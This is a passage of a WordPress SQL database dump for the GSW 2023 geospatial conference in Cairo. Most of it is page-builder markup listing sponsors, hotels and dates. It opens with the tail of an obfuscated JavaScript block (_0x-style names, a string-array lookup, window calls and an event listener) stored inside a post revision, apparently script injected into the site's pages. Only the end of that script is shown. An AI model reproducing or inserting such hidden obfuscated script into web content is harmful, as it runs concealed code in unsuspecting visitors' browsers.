_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:13:27','2023-08-15 23:13:27','',3066,'https://gsw2023.com/?p=5213',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5214,1,'2023-08-15 23:14:34','2023-08-15 23:14:34','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" 